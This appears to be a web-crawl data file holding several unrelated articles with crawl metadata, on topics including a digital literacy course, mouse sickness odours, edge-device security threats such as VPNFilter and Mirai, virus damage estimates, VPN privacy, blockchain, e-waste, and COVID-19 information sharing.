https://www.itproportal.com/2011/09/21/babbages-notes-be-digitised-all/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00047.warc.gz
|
en
| 0.957964 | 341 | 3.09375 | 3 |
TestOut Launches New Course and Certification to Teach IT Essentials
There are dueling — and somewhat overlapping — definitions of digital literacy in the information technology (IT) realm. The more traditional take is that digital literacy describes an individual's ability to find, evaluate, and communicate information via typing and other input media on various digital platforms. (Finding and evaluating information on digital platforms? Much trickier than it used to be.)
The newer, emerging definition describes an individual's ability to use and understand the most common hardware and software tools: computers, printers, word processing programs, and so forth. (The overlap is in skills development. For example, you'll need to develop your ability to input information, most likely by typing, either way.)
The second definition is most likely the one best embodied by Digital Literacy Pro, a new product being launched this week by IT courseware and certification provider TestOut. The core audience is anyone who needs to develop basic fluency with IT tools, programs, and platforms. That includes everyone from middle school students to senior citizens.
It's worth pointing out, incidentally, that the market is getting younger all the time: Lots of school districts in the United States, for example, will be passing out Chromebooks to elementary school students starting as early as this week.
The list of IT topics covered by Digital Literacy Pro is impressive and includes, but is not limited to, the following: keyboarding, hardware, operating systems and file systems, intro to applications, word processing, spreadsheets, presentations, common applications, online and cloud collaboration, the basics of internet and social media, mobile technology, and programming fundamentals. There's even some exploration of common IT career paths.
TestOut has a longstanding reputation in IT education circles for its robust simulation technology. Most lessons include simulations of common IT tasks that walk learners through everything from networking a printer to navigating common operating systems. This has the notable advantage of letting students learn by doing while not putting expensive hardware and software at risk.
It also means that TestOut courses, including Digital Literacy Pro, are available online, providing the anywhere, anywhen — that internet connectivity is available — study convenience that students and educators have increasingly come to expect. TestOut courses are also unique in that the cost of certification, and the certification exam, are included in the purchase price. First they teach skills, then you get the cert.
However you define it, digital literacy is increasingly important across the employment spectrum, and increasingly essential to navigating daily life outside the workplace. In the United States, the National Center for Education Statistics reported in 2018 that 74 percent of U.S. adults use a computer for work, while 81 percent of U.S. adults use a computer in everyday life.
If those statistics sound intimidating, then Digital Literacy Pro could be the "prepared to encounter life" solution that parents, children, and workers are looking for.
|
<urn:uuid:67ff3f3a-5d54-4c9a-8fad-13ee7e930e77>
|
CC-MAIN-2022-40
|
https://www.gocertify.com/articles/testout-launches-new-course-and-certification-to-teach-it-essentials
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00047.warc.gz
|
en
| 0.946353 | 595 | 2.75 | 3 |
Odors surround us, providing cues about many aspects of personal identity, including health status. Now, research from the Monell Center extends the scope and significance of personal odors as a source of information about an individual’s health.
A new paper in the open-access journal Scientific Reports reveals that the bodily odors of otherwise healthy animals sharing an environment with sick animals become like the odors of the sick animals.
The findings suggest that odor cues associated with sickness can cause biological changes in healthy individuals, potentially impacting social contacts and perhaps even patterns of disease spread.
“Exposure to the odors of sick individuals may trigger protective or preparative responses in their social partners to minimize the risk of impending infection,” said study lead author Stephanie Gervasi, Ph.D., a Monell chemical ecologist.
Previous Monell work had demonstrated that inflammation leads to bodily odor changes, suggesting that immune-activated odors might signal the presence of disease risk (or possible contagion) to other members of a species.
In the current study, the researchers injected mice with lipopolysaccharide (LPS), a non-infectious bacterial toxin that causes inflammation, activation of the immune system, and other symptoms associated with sickness.
The LPS-injected “sick” animals were then housed in the same cages as healthy animals.
Results from bioassays using “sniffer” mice trained to differentiate between urine odors from LPS-injected and healthy animals indicated that healthy partners of sick animals smelled more like sick, as compared to healthy, animals.
A parallel analysis using statistical predictive modeling of urinary odor compounds identified via analytical chemistry confirmed the behavioral bioassay findings:
models were more likely to classify odor compounds from healthy mice as sick rather than healthy when the healthy mice were co-housed with sick animals.
Similar results were obtained when the study was repeated with sick and healthy animals that were physically separated by a perforated partition.
The partition allowed odors to circulate, strongly suggesting that the changes in the healthy mice were not the result of physical odor transfer.
The combined findings reveal that body odors of healthy animals can change in the presence of odor-based sickness signals.
“This work shows not only that odors signal disease but that they can have strong effects on individuals that detect them,” said Monell behavioral biologist Gary Beauchamp, Ph.D., one of the paper’s senior authors.
“This is a remarkable transfer of information via olfaction that specifically alters physiology and could play a role in disease transfer among individuals in many species.”
Bruce Kimball, Ph.D., a research chemist from the USDA National Wildlife Research Center Research (NWRC) stationed at Monell and also a senior author, notes that the study’s findings may be particularly relevant to wildlife populations.
“This knowledge that healthy animals can emit odors associated with sickness may inform our efforts to use bodily odors to understand how pathogens are transmitted within a population of animals,” he said.
More information: Scientific Reports (2018). www.nature.com/articles/s41598-018-32619-4
Journal reference: Scientific Reports search and more info website
Provided by: Monell Chemical Senses Center
|
<urn:uuid:0403de52-2572-462e-b10c-8d7f14b0e865>
|
CC-MAIN-2022-40
|
https://debuglies.com/2018/09/24/odors-as-a-source-of-information-about-an-individuals-health/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00247.warc.gz
|
en
| 0.935991 | 694 | 3.390625 | 3 |
Importance of Securing Edge Devices
Over the last few years, devices deployed at the boundaries of interconnected networks, also known as edge devices, such as routers and network-attached storage (NAS) devices have become the target of sophisticated malicious activity.
Growing Threat to Edge Devices
The discovery by researchers at Cisco Talos of the malicious software (malware) called “VPNFilter” highlighted the growing threat to edge devices. As of May 2018, researchers at Cisco Talos estimated that at least 500,000 home and office routers and network-attached storage (NAS) devices in at least 54 countries were infected with the VPNFilter malware. The known devices affected by VPNFilter were Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) devices.
VPNFilter is a particularly dangerous malware as it persists on the infected device even after a reboot, works as an intelligence-collection platform capable of file collection, command execution and data exfiltration, and possesses a self-destruct capability that overwrites a critical portion of the infected device’s firmware and reboots the device and as a result, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Researchers at Cisco Talos said that they’re unsure how VPNFilter infected close to half a million devices but said that most devices targeted were particularly older versions, have known public exploits or default credentials that make compromise relatively easy. VPNFilter was ultimately degraded due to the coordinated actions between law enforcementand cybersecurity companies, including the seizing of the domain that was part of the malware’s command-and-control infrastructure.
According to the nonprofit organization Cyber Threat Alliance (CTA), the VPNFilter activity prompted CTA members to take a closer look at the growing threat to edge devices. “The scale of such a threat would be tremendous, as there are millions of devices that fall within these categories,” CTA said.
Why Edge Devices Are Vulnerable to Cyberattacks?
Unlike computers and servers, which are often given attention to by system administrators, edge devices, although vital to the operation of many organizations, are given very little or no oversight. Edge devices include network edge devices: routers, switches, wide area network (WAN) devices, VPN concentrators; network security devices: firewalls; network monitoring devices: network-based intrusion detection systems (NIDS); and customer premise devices: integrated access devices.
In the paper “Cyber Treat Alliance Joint Analysis: Securing Edge Devices”, CTA cited default configuration settings and backdoors as some of the reasons why edge devices are prone to cyberattacks.
Default Configuration Settings
Edge devices are typically shipped with pre-configured default settings, for instance, factory login details, leaving the task of manually changing these login details to the users to make these devices more secure. Many users, however, make no time in changing these factory login details, leaving the devices vulnerable to attacks.
A case in point under the default configuration settings is the Mirai – a malware which at its height infected hundreds of thousands of devices, many of them routers. These infected devices were then controlled by the attackers as a botnet or an army of infected devices used for malicious activities such as distributed denial-of-service (DDoS) attacks. The original Mirai malware is linked to the DDoS attacks on the website of cybersecurity journalist Brian Krebs. When one of the Mirai authors publicly published the source code of the malware, it was revealed that this malware successfully infected hundreds of thousands of devices by using 61 factory or default login details.
A backdoor is an undocumented way of gaining access to a computer system without going through the system’s customary security mechanisms. Vendors of edge devices install backdoors in these devices for administrative purposes to gain data on performance, maintenance or reliability. In some cases, backdoors are installed to aid law enforcement investigations. These backdoors, however, could be used by malicious actors to gain access to the device and the network.
A case in point under backdoors involves Barracuda’s hardware devices, including web filter, web application firewall and SSL VPN, which in November 2012 were all discovered by a security researcher at Vienna, Austria-based SEC Consult Vulnerability Labto have undocumented backdoor accounts that allow for remote access.
In addition to default configuration settings and backdoors, the CTA cited the fact that edge devices have no intrusion prevention systems or anti-malware solutions in place and the near 100% uptime of these devices which delays patching as the other reasons why these devices are vulnerable to cyberattacks.
As consequences of the vulnerabilities in these edge devices, the CTA said that these vulnerable devices have been used by malicious actors as a platform for
for future attacks, from the illicit use of computing power for cryptocurrency mining to monitoring traffic, establishing persistent access to target networks or systems, exfiltrating information, and launching offensive cyberattacks on networks to “deny, degrade, disrupt, or destroy information or infrastructure”.
Cybersecurity Best Practices
Malware such as VPNFilter and Mirai, backdoors, absence of anti-malware and anti-intrusion solutions and high uptime of edge devices necessitate that these devices need the same diligence as protecting your organization’s computers and servers.
As recommended by the CTA, here are some cybersecurity best practices in order to protect your organization’s edge devices from becoming the target of sophisticated malicious activity:
- Practice network segmentation.
- Ensure all factory login details are updated during the installation process and during every update.
- Install the latest security updates of all edge devices as timely as possible.
- Regularly review configurations of networking devices.
- Limit connections to the management interface to only trusted, secure hosts.
- Ensure that all communication between edge devices is encrypted.
- Regularly monitor the behavior of network edge devices.
- Buy edge devices only from trusted suppliers.
Your computer network might be vulnerable if you are using outdated devices or software. Call todayor emailto book a consultation and our IT and security expertswill be happy to help identify and address the vulnerabilities.
|
<urn:uuid:444efcbb-7dd4-4225-8495-1f0ac76e8f32>
|
CC-MAIN-2022-40
|
https://www.genx.ca/importance-of-securing-edge-devices
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00247.warc.gz
|
en
| 0.929581 | 1,296 | 2.703125 | 3 |
In some places, technology is turning school inside-out, with homework in school and lectures at home, delivered through iPads or other tablets. The Washington Post highlighted Stacey Roshan’s class, saying the philosophy of the so-called “flipped” classroom is that teachers can spend more time in the classroom with students who need help. This way, students can work to solve problems with guidance instead of suffering on their own to do homework outside of school.
Before the classroom was flipped, Roshan told the news source that her AP calculus class was pretty hard for some kids. Many couldn’t quite grasp the problems on their own and weren’t getting enough time with the teacher.
“My AP calc class was a really anxious environment,” Roshan said to the Post. “It was weird trying to get through way too much material with not enough time. It was exactly the opposite of what I was looking for when I got into teaching … [flipping] would create an environment where students could really work together. It would let me change the dynamic and bring that compassion back into the classroom.”
One student from Roshan’s 11th grade class, Brooke Gutschick, said she watches a video made by her teacher about four nights a week, according to the Post story. Each video is 20 to 30 minutes long, so much shorter than the average lecture would be in class. In class, Gutschick works with other students and the teacher, no longer having to struggle on her own.
“There is a lot more support with this and it’s a lot easier to learn,” Gutschick said. “You don’t get stressed out about what you are doing.”
In a piece for The Daily Riff, teachers Jonathan Bergmann and Aaron Sams said one great benefit of flipping a classroom is that it helps increase the student-teacher interaction time. The role of the teacher essentially changes to learning coach, so there is more time spent talking with kids and less time spent simply lecturing a group of kids who may or may not be up to speed with what is happening in class.
“Since the role of the teacher has changed, to more of a tutor than a deliverer of content, we have the privilege of observing students interact with each other,” the teachers said. “As we roam around the class, we notice the students developing their own collaborative groups. Students are helping each other learn instead of relying on the teacher as the sole disseminator of knowledge.”
What do you think of the new classroom flipping trend? Is there any type of classroom computer or software you think would be very useful for this? Let us know!
|
<urn:uuid:23344f02-7283-4b83-a35a-16b68e59320d>
|
CC-MAIN-2022-40
|
https://www.faronics.com/news/blog/teachers-flipping-for-technology-in-the-classroom
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00247.warc.gz
|
en
| 0.976027 | 574 | 3.03125 | 3 |
http://www.theregister.co.uk/content/56/23707.html By John Leyden Posted: 16/01/2002 at 17:33 GMT Computer Economics has published its assessment of the damage worldwide caused by malicious code attacks in 2001 - the figure comes in at a whopping $13.2 billion. This is 23 per cent less than 2000, the year of the Love Bug, when damages from viruses were estimated at $17.1bn. In 1999 the cost to the world was $12.1 billion in 1999, Computer Economics says. The research firm has totted up the damage wreaked by viruses each year since 1995, But the results are controversial. Critics in the antivirus industry dismiss Computer Economics assessment of the damage caused by the combined effects of Nimda ($635 million), Code Red variants ($2.62 billion), SirCam ($1.15 billion) et al last year as a "guesstimate". They argue that it's hard to calculate the number of infected systems and the total damage caused during a virus outbreak, partly because costs will vary widely by company. Patching systems is, after all, a core part of the work of most sysadmins. Michael Erbschloe, vice president of research at Computer Economics, angrily rejected criticisms of its methodology and said its work helped firms decide how to defend against viruses. Erbschloe said Computer Economics does "everything we can to get an accurate number and great lengths to determine what the hit rate is". The $13.2 billion figure on the cost of infections in 2001 is "not an audit" but it is "accurate", although Erbschloe declined to say just how accurate it was. Methodology Computer Economics' methodology involves first conferring with anti-virus companies, governments, law enforcement and major firms, Erbschloe told us. It then tries to work out how many people received a virus and from that calculates how many were infected. From this, Computer Economics estimates the cost of patching systems and losses in worker productivity from dealing with a viral outbreak, based on benchmarking the cost of cleaning a computer of a virus. One of the problems of this approach, explains Alex Shipp, chief antivirus technologist at managed services firm MessageLabs, is that "users are unable to estimate the damage a virus outbreak might cause their own company ... so how does a third party get a figure?" Graham Cluley, senior technology consultant at Sophos Anti-Virus, described Computer Economics figures as a "guesstimate", supported by insufficient data. "Most companies simply don't know how much a virus cost them," he said. "As well as lost productivity, viruses can also cost money through damaged credibility, effects on customer relations and attacks on confidentiality which is hard to estimate." MessageLabs and Sophos say that Computer Economics has never contacted them about statistics on infections. Even if a vendor tracks the percentage of infected emails it blocks (as MessageLabs does), or consumer PCs scanned which are infected (as McAfee does), it is very difficult to place a dollar figure on such data. Erbschloe said he didn't care what Sophos or MessageLabs thought. He said AV vendors quote Computer Economics figures but disagree when an estimate is either higher or lower than suits them. "Some of them are full of shit," Erbschloe told us, before calming down to say, "our figures help end-users decide how much to spend on antivirus". Assessing the cost of virus infections isn't like counting server sales, and whoever you sympathise with here, it would be wise to take any figures with a grain of salt and to remember the AV industry has struggled with metrics for years. - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 16:42:12 PST
|
<urn:uuid:c692d4d5-c650-47f3-93e8-c942241acd85>
|
CC-MAIN-2022-40
|
http://lists.jammed.com/ISN/2002/01/0095.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00247.warc.gz
|
en
| 0.962175 | 822 | 2.53125 | 3 |
What Does My ISP See When I Am Connected To VPN?
A virtual private network (VPN) gives you online privacy and anonymity by creating a private network from a public internet connection. VPNs mask your internet protocol (IP) address so your online actions are virtually untraceable. Most important, VPN services establish secure and encrypted connections to provide greater privacy than even a secured Wi-Fi hotspot.
Your ISP sees your VPN connection because they can recognize an unfamiliar IP address. However, they cannot see anything specific about your online activity. This includes your search and download history, as well as the websites you visit.
What’s Visible To ISPs When You Use A VPN?
While a VPN does keep you anonymous online, your ISP will still be able to see some of the following:
- Your VPN connection: Your ISP will see that you connect to a VPN server but won’t know what you are doing. All information is encrypted and illegible.
- Your VPN server’s IP (Internet Protocol) address: Thanks to your ISP, you have access to the internet. They are responsible for sending your requests as data packets to a VPN server. So, they’ll always know the VPN’s IP address but not the data packet’s final destination.
- Your VPN’s protocol: To provide a safe connection, VPNs use a technology that offers different protocols (visible to your ISP). Even though your ISP sees what protocol you’re using, they cannot take any information from it, so it doesn’t affect you in any way.
- Your connection timestamps: Your ISP can always see when you connect and for how long, but they won’t know what websites you’re on. Whether you use a VPN or not, they’ll see when you connect to the internet.
- Your bandwidth usage: When you browse, stream, download large files, or play games, your ISP may see how much bandwidth you use. But they won’t know what you’re using it for.
Apart from these, the only other important thing your service provider can detect is the fact that your actual online traffic is hidden from them. That means it loses access to the following information:
- The websites you visit
- The specific web pages you browse and the time you spend there
- Your browsing and search history
- The files you download from or upload to unencrypted websites
- The info you type on unencrypted websites
|
<urn:uuid:acaaf733-9583-4dda-a397-c52664a47c41>
|
CC-MAIN-2022-40
|
https://www.abijita.com/what-does-my-isp-see-when-i-am-connected-to-vpn/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00247.warc.gz
|
en
| 0.901557 | 547 | 2.515625 | 3 |
The concept of blockchain has been going on in the field of technology for quite some time. Though blockchain technology appears to be complicated, the core concept behind it is pretty understandable. A blockchain is typically a type of database.
Like every other database, blockchain is also used to store data and information electronically. But the primary difference between the usual database and blockchain is the way the data is structured. A normal database stores data in the form of tables with entries. Whilst blockchain collects and stores data and information as a group. These groups are known as blocks.
Each of these blocks in the blockchain has a certain storage capacity. Once these capacities reach the limit, the current block is chained up with the previous block. Every block in the blockchain network has its hash and the hash of the previous block. Hash is the way of encrypting data by converting digital information into a set of strings and numbers. Every newly created block is chained up with the previous block once its capacity is reached. This is basically how a blockchain network is formed.
Moreover, blockchain is a decentralized, distributed ledger technology. This means that there is no ownership over the data and information on the blockchain network. With the help of distributed ledger technology (DLT), the data can be shared within the blockchain network. Once the data has been entered into the blockchain, it becomes immutable. That is, no one can alter or edit the data after it has been inserted into the blockchain. Additionally, blockchain also provides data transparency by making the data traceable over the blockchain network.
Market size and growth rate of the blockchain (2020-2025)
The global blockchain market is expected to reach $39.7 billion by 2025 with a compound annual growth rate of 67.3% between 2020 and 2025.
Meanwhile, by the end of 2024, companies are expected to spend $20 billion on each blockchain-based service.
Categorizing the industrial sector by the size of organizations, the SME segment is predicted to grow at the highest rate during the forecast period. That is, between 2020 and 2025.
While categorizing the industrial sector based on the application of blockchain technology, the financial and banking sector contributes majorly towards the growth of the global blockchain market during the forecast period.
Future scope and application of blockchain technology in various sectors
According to Statista, the value of the global blockchain market in the food and agriculture sector is forecasted to reach about $1.4 billion by 2028.
From cryptocurrencies, blockchain has widened its scope of applications across various sectors such as banking and finance, healthcare, smart contracts, supply chain, etc…
Blockchain in banking and financial sectors
The financial and banking sectors are expected to be the two most major contributors to the growth of blockchain in the near future. Implementing blockchain technology in the financial and banking sectors can be beneficial in reducing transaction costs, fraud detection, trading and payments.
Almost all the banks today are built on centralized databases. A centralized database is highly prone to cyberattacks as the hacker can have complete control over the data on the database once the barrier-level security has been breached. Blockchain technology using cryptography makes it impossible for the hacker to enter into the system. Additionally, to access one single block of the network, the entire chain of blocks has to be accessed.
When it comes to trading, a lot of paperwork is involved. Such as a letter of credit that has to be sent through fax or posts to the involved parties, regardless of their locations. So, when multiple parties have to access the same information, blockchain becomes the obvious solution.
Banks function only 5 days a week and anyone who needs to transfer money on weekends has to wait till the start of next week. Sometimes, the transaction process may be delayed or even fail at times. The usage of blockchain for payment transactions not only ensures a fast transaction but also keeps the record of transactions with the timestamp.
Blockchain in Healthcare sector
The Healthcare sector deals with so much sensitive information on a daily basis. Hence it becomes very important to secure those data. With blockchain technology, the generated medical record can be digitally signed and written into the blockchain, after which the patient can be provided with a proof of concept (POC) that the record will remain unaltered.
These medical records can be encrypted and stored in the blockchain network with a unique key or a private key. This ensures privacy by allowing only the members who have the key to access the data.
Blockchain in Smart contracts
Smart contracts are blocks of code that can be written into the blockchain to validate and verify an agreement. The program will be executed only when the given conditions are satisfied. Smart contracts eradicate the need to draw up a bunch of paperwork and the need for a third party to validate the agreement.
Blockchain in supply chain management
Today’s world is moving towards a fast-paced lifestyle. The demand for products and services is exponentially increasing. To keep up with the demand vs supply requirements, companies had to improve the speeds of their business processes. Especially in the supply chain area. Blockchain technology has greatly helped companies in achieving this.
Manual processes that depend on paper tend to consume a lot of time. This mostly happens in the shipping industry. These processes can be replaced by blockchain technology to reduce the time consumed.
Using blockchain, the traceability of the product can be increased. That is, organizations can create a decentralized record of all transactions to track the products from production to delivery or the customer.
Limitations of blockchain technology
Blockchain technology has brought in various positive impacts in the field of technology. But there are still some limitations to adopting this technology.
Cost and implementation
The initial cost of implementing blockchain technology is massive. There are open-source blockchain solutions available, but to implement this technology it is essential to hire developers and other experts to develop and maintain. Paid blockchain solutions have to be licensed.
Typically, an enterprise-level blockchain solution could cost around a million dollars.
Expertise in the field
As mentioned earlier, a blockchain system needs to be properly maintained. People who have plenty of experience and knowledge in this area have to be hired. Only then the existing employees of a company or an enterprise have to be able to understand the complexities behind how the system works.
The number of transactions a blockchain network can process is limited by a consensus mechanism. This mechanism requires every node in the process to verify the transaction. This does not support blockchain-based applications with large volumes of transactions. One of the well-known applications of blockchain in cryptocurrency is bitcoin. Currently, bitcoin is limited to 7 transactions per second.
The data becomes immutable once it has been entered into the blockchain network. That is, it is not possible to edit or alter the data after the data has been entered. Though this is considered to be an advantage for various reasons, it still has its drawbacks.
If the data has been wrongly entered or if it needs to be altered, it becomes practically impossible to do so.
Major players in the field of blockchain technology
Consensys, a blockchain company, develops enterprise-level blockchain applications and developer tools that are secure and efficient. The company also supports blockchain startups by investing alongside them.
2) Blockchain Intelligence Group
Blockchain Intelligence Group is one of the most trusted blockchain companies in the world. The company provides consulting services on building blockchain applications. The company also aims in providing optimum solutions for reducing the risk involved in cryptocurrency transactions.
Blockchangers is one of the most prominent blockchain companies that has dominated their presence in the IT sector. The company provides consulting services on blockchain-based project ideas and assists the clients to understand and leverage the benefits of blockchain. The company also provides lectures, workshops and development services to the clients.
Top 10 sites to learn blockchain technology
There are many students and people who are enthusiastic about the blockchain field. Many online courses are offered by experts and professionals in this field. The 10 most rated websites are:
- IBM cognitive class platform
- B9 lab academy
- Khan Academy
- Class central
Career scope in the blockchain sector
The blockchain sector has been exponentially growing in almost all fields. The blockchain sector also offers unlimited career opportunities as there is an increasing demand for experts in this field. Some of the job roles that the blockchain sector offers are,
- Blockchain developer
- Blockchain solution architect
- Blockchain project manager
- Blockchain UX designer
- Blockchain quality engineer
- Blockchain legal consultant
Experts Insights on blockchain technology
Many experts and leaders in the field of blockchain technology have shared their insights on this technology. Out of which, a few of those are mentioned below.
1) Benjamin Dynkin, a cybersecurity attorney in NYC, anticipates that blockchain technology is the solution to eliminate the need for trust in transactions.
2) Kyle Therriault, executive vice president at Auto Accessories Garage, pointed that blockchain technology will assist in bringing self-driving cars to the market. Though these self-driving cars have passed the test runs, there will be issues related to self-driving vehicles for cybersecurity-related reasons. With blockchain, complete security is provided against cyberattacks.
3) John Zanni, President of Acronis, predicted during the initial stages of blockchain development that it could potentially address all of the modern-day security concerns like identity and fraud detection. Blockchain will also help online business vendors and financial organizations to fight against cybercrime.
Several years of research and development of blockchain technology have finally paid off for good. Many practical solutions based on blockchain technology are being developed and deployed these days. In the upcoming years, blockchain technology would make business as well as government processes more efficient, accurate, secure and cost-efficient with very less or no involvement of third parties.
|
<urn:uuid:16d573a5-5bf6-4084-a73d-7d410555d832>
|
CC-MAIN-2022-40
|
https://expersight.com/what-is-blockchain-technology-market-size-use-cases-future-scope/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00447.warc.gz
|
en
| 0.945257 | 2,030 | 3.265625 | 3 |
What is E-Waste?
Electronic waste or commonly referred to as e-waste are electronics that are nearing the end of their “useful life”. This ranges from laptops and computers to batteries and chargers. Furthermore, e-waste can also be defined as any discarded electronic with a battery, plug or power source, and features toxic and hazardous materials such as mercury, which brings risks to human health and the environment.
Environmental Threats of E-Waste
According to the World Economic Forum, the globe discarded 57.4 million tonnes of electronic waste into landfills in 2021—which outweighs the Great Wall of China. The cause for an increase in global e-waste is the growth of consumption and production of electronic products. Tech giants tend to release new generations of devices each year and consumers are inclined to chuck their old devices and upgrade to the new—even if their current device is in perfect condition. This is a huge contributing factor to the increase in annual global e-waste.
Electronic waste poses many effects on climate change. Every device on our planet has a carbon footprint and has contributed to global warming. The process of manufacturing laptops and other devices creates carbon emissions caused by CO2. Therefore, the vast production of devices pushed through manufacturing facilities each year, contributes to overall negative environmental impacts.
Reduce. Reuse. Repair. Recycle.
To reduce carbon footprint, emissions and the overall health of our planet concerning the e-waste problem, businesses need to include the Power of 4R’s into their corporate social responsibility plans. Being mindful of where e-waste lands can help you to limit how much you consume and its environmental impacts.
It’s simple! Instead of buying the latest and greatest device, take care of the device you have, to ensure its lifespan lasts longer.
Instead of throwing away your old device, visit a refurbisher! You can receive maximum value for your retired assets and avoid sending your gadget to the landfill.
This is the utmost responsible and environmentally friendly way to dispose of your assets! It’s also easier than you think. Certified recyclers like Lifespan provide simplified recycling solutions for businesses. Our EZ-cycle® Box is designed to dispose of your obsolete IT equipment without facing any penalty or legal issues.
Reduce E-Waste Threats with Lifespan
At Lifespan, minimizing carbon footprint is an essential component of all our ITAD processes. We understand the growing issue of electronic waste and its impacts on our health and the environment. Lifespan provides comprehensive IT recycling solutions to help build a better planet and brighter future. Schedule a call with one of our experts today to equip your ITAD program with responsible IT recycling.
|
<urn:uuid:2aa95ea5-091b-4498-a6c6-1e89d744e611>
|
CC-MAIN-2022-40
|
https://www.lifespantechnology.com/the-threat-of-e-waste/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00447.warc.gz
|
en
| 0.92444 | 583 | 3.125 | 3 |
Every organization has sensitive information that it must protect at all costs. If that information is lost or compromised, a business can suffer the loss of profits, consumers, reputation, and much more. That is why it is crucial to understand data loss and everything that comes with it.
So, if you want to understand this term, you have come to the right place. Here is everything you need to know about it.
Data Loss Definition
Data loss occurs when an organization loses sensitive information or is compromised because of power outages, malware, viruses, human error, or theft. Besides that, damage to data can also be physical, such as equipment or mechanical failure.
Organizations must set the right policies to ensure that they don’t lose all their data and sensitive information. Besides that, they must also have strategies and plans for when data loss occurs. Such plans will ensure that the organization is protected at all times.
The Top Causes Of Data Loss
Here are the top causes that can lead to damages in your organization:
- Laptop Or Computer Theft
The age of PCs is over, and most people now use their laptops or smartphones to work and conduct business. That is why laptop theft is one of the most significant risks and causes of data loss. It can happen anywhere if someone leaves the laptop open and unattended for others to grab.
Besides, laptop theft also causes a data breach if your staff stores or accesses sensitive information on their devices. So, you must take steps to minimize this risk that can cause loss.
- Human Error
Humans are prone to mistakes, which is part of our nature, which is why we can make big mistakes. For example, human error in data can lead to the deletion of data, overwriting, and much more. On the other hand, human error can also lead to physical damage that can lead to data loss, such as liquid spills, damage to the hard drive, and much more.
That is why all businesses must train their employees to handle data correctly. The staff must understand all aspects of data to take it appropriately.
- Malware And Viruses
All computers and laptops are prone to viruses and malware. Viruses can lead to data stealing, data deletion, and much more. Most computers get viruses from email or phishing attacks.
That is why you must invest in anti-virus software to guard your computer against such data loss threats. Besides that, be sure to backup data in another location.
That is everything you need to know about data loss and what causes it to happen in an organization. Once you understand these causes, you can take the appropriate steps to ensure that it does not happen to your business. When you take these steps, you will have peace of mind knowing that your data is always protected.
|
<urn:uuid:8d17a836-d033-44e8-81fe-8a5d8db6c882>
|
CC-MAIN-2022-40
|
https://fluentpro.com/glossary/data-loss/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00447.warc.gz
|
en
| 0.954344 | 581 | 3.203125 | 3 |
Face masks — the unofficial image of the COVID-19 pandemic — are leveling up.
A masks outfitted with particular electronics can detect SARS-CoV-2, the virus that causes COVID-19, and different airborne viruses within 10 minutes of exposure, supplies researcher Yin Fang and colleagues report September 19 in Matter.
“The lightness and wearability of this face masks permits customers to put on it anytime, anyplace,” says Fang, of Tongji College in Shanghai. “It’s anticipated to function an early warning system to stop massive outbreaks of respiratory infectious ailments.”
Airborne viruses can hitch a journey between hosts within the air droplets that folks breathe out and in. Folks contaminated with a respiratory sickness can expel 1000’s of virus-containing droplets by speaking, coughing and sneezing. Even these with no indicators of being sick can typically move on these viruses; people who find themselves contaminated with SARS-CoV-2 can begin infecting others at least two to three days before showing symptoms (SN: 3/13/20). So viruses usually have a head begin in relation to infecting new individuals.
Fang and his colleagues designed a particular sensor that reacts to the presence of sure viral proteins within the air and hooked up it to a face masks. The workforce then spritzed droplets containing proteins produced by the viruses that trigger COVID-19, chicken flu or swine flu right into a chamber with the masks.
The sensor may detect only a fraction of a microliter of those proteins — a cough would possibly comprise 10 to 80 instances as a lot. As soon as a pathogen was detected, the sensor-mask combo despatched a sign to the researchers informing them of the virus’s presence. In the end, the researchers plan for such indicators to be despatched to a wearer’s cellphone or different gadgets. By combining this expertise with extra standard testing, the workforce says, well being care suppliers and public well being officers would possibly be capable of higher comprise future pandemics.
|
<urn:uuid:aff6f456-93e9-41e7-9588-1d4395b0db08>
|
CC-MAIN-2022-40
|
https://dimkts.com/this-face-mask-can-sense-the-presence-of-an-airborne-virus/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00447.warc.gz
|
en
| 0.943818 | 431 | 2.96875 | 3 |
Wednesday, September 28, 2022
Published 2 Years Ago on Tuesday, Oct 27 2020 By Adnan Kayyali
The World Health Organization and the nonprofit administration of Wikipedia have announced their commitment towards making critical COVID-19 information accessible to everyone.
The latest collaboration between the two organizations will ensure equitable, free, and available information amidst the ongoing pandemic. The information will be available under the Creative Commons Attribution-ShareAlike license. This allows any outside organization to freely share the COVID-19 information on their own platforms, further spreading essential knowledge.
“Access to information is essential to healthy communities and should be treated as such,” said CEO at the Wikimedia Foundation, Katherine Maher. “This becomes even more clear in times of global health crises when information can have life-changing consequences. All institutions, from governments to international health agencies, scientific bodies to Wikipedia, must do our part to ensure everyone has equitable and trusted access to knowledge about public health, regardless of where you live or the language you speak.”
In addition, people can also access Wikimedia Commons digital multimedia library, containing videos, infographics, and other public health-related content. Now, Wikipedia’s 250,000 independent editors and volunteers can be used to push more extensive Covid-19 information. There are currently over five thousand virus-related articles, with many Wiki volunteers able to translate the content into numerous languages.
Wikipedia and WHO teams have been busy tackling and fending off misinformation, which has caused significant damage over the past few months. Users can now access the WHO myth busters’ infographic series.
